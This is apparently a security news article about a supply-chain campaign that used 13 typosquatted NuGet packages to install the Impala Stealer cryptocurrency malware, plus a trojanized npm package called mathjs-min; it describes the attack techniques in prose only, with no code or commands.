Cybersecurity researchers have recently elucidated the details of the cryptocurrency stealer malware that was disseminated through 13 malicious NuGet packages as part of a supply chain attack targeting .NET developers. This sophisticated typosquatting campaign, which was discovered by JFrog at the end of last month, imitated legitimate packages to execute PowerShell code intended to retrieve a follow-up binary from a predetermined server. This two-stage attack culminates in the deployment of a .NET-based persistent backdoor, known as Impala Stealer, which is capable of obtaining unauthorized access to users’ cryptocurrency accounts. In a statement to The Hacker News, JFrog stated, “The payload used a very rare obfuscation technique, called ‘.NET AoT compilation,’ which is a lot more stealthy than using ‘off the shelf’ obfuscators while still making the binary hard to reverse engineer.”
.NET Ahead-of-Time (AoT) compilation is an optimization technique that allows applications to be pre-compiled to native code, resulting in faster startup time and reduced memory usage. Furthermore, these native AOT applications can be run on a machine without the .NET runtime installed. Additionally, the second-stage payload comes with an auto-update mechanism that allows it to retrieve new versions of the executable from a remote location. Furthermore, it achieves persistence by injecting JavaScript code into Discord or Microsoft Visual Studio Code applications, thereby activating the launch of the stealer binary.
The binary then proceeds to search for the installation of the Exodus Wallet desktop application and inserts JavaScript code into various HTML files in order to harvest and exfiltrate sensitive data to a hard-coded Discord webhook. The JavaScript snippet, which has since been deleted from an online paste website, is suspected to have been used to steal user credentials and access other information of interest. Shachar Menashe, Senior Director at JFrog Security Research, stated that “bad actors used typosquatting techniques to deploy a custom malicious payload […] which targets the Exodus crypto wallet and leaks the victim’s credentials to cryptocurrency exchanges, by using code injection.”
Our investigation has revealed that no open source software repository is entirely reliable, thus it is necessary to implement precautionary measures throughout the software development lifecycle to guarantee the security of the software supply chain. This conclusion has been drawn following the discovery of a malicious npm package, named mathjs-min, which was uploaded to the repository on March 26, 2023, and found to contain a credential stealer that can extract Discord passwords from the official app and web browsers such as Google Chrome, Brave, and Opera. It has been established that this package is a modified version of the popular Javascript math library mathjs, which was injected with malicious code after being forked, and then published to NPM with the intention of deceiving users into believing it was a minified version of the genuine mathjs library.